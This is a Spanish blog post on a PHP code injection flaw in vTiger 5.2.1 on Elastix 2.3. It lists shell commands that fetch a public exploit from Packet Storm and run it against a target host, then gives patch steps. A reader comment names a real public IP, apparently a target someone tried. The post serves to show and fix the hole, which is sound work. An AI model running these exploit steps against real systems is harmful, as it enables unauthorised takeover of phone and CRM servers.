Explotando vulnerabilidad PHP Code Injection Exploit en VTIGER 5.2.1
De regreso con las vulnerabilidades en VTIGER, anteriormente habíamos hablado de «Vulnerabilidad de directorios transversales» que afecta hasta implementaciones en Goautodial. En este oportunidad, vamos hablar otra denominada «PHP Code Injection» , el fundamento básico de esta técnica, es inyectar código arbitrario, como lo hace una inyección SQL.
Lo delicado de esto, es que se ha desarrollado un programa a modo de «exploit» que automatiza este ataque, para tomar el control de una plataforma Elastix primordialmente, que tiene la version de Vtiger vulnerable.
Más adelante, me tomare el tiempo, para explicar como funciona el programa al detalle, por ahora me interesa, mostrar cómo se ejecuta el exploit, cómo funciona cuando es exitoso, y después como lo parchamos, para que la vulnerabilidad ya no este activa.
Escenario de prueba
Atacante
SO : Kali Linux 32bits
Atacado
SO : Elastix 2.3 recien instalado y sin actualizar
1.-Explotando nuestro sistema y viendo si somos vulnerables.
#apt-get install php5-curl curl
#wget http://packetstormsecurity.com/files/download/119253/elastix23-exec.txt
#mv elastix23-exec.txt elastix.php
#chmod a+wrx elastix.php
#php elastix.php
Nos solicita ingresar la direccion IP del host atacado
Enter Target [https://ip] # https://192.168.10.142
Si el exploit es satifactorio, habremos optenido el acceso como lo muestra el siguiente video
2.- Parchando la vulnerabilidad
Aactualizacion a VTIGET 5.2.1-7
#yum update elastix-vtigercrm
o la que mas me gusta , Como diria mi abuela , que en paz descanse …. santo remedio hijo !! 😀
#mv /var/www/html/vtigercrm /root/
3.- Condiciones
– Si bien es cierto el «exploit» esta enfocado a Elastix, con algunas modificaciones , puede funcionar para cualquier otra plataforma que user Vtiger.
– Solo afecta a implementaciones de Elastix 2.3 sin Actualizar que contengan Vtiger Crm
– No afecta a Elastix 2.4 , debido a que ya tiene la actualización por default.
https://207.155.197.76
didnot open
Pues ni tanto 😛
Acabo de ver un server con la versión más actual (elastix-vtigercrm-5.2.1-7) y aún así lo hackearon.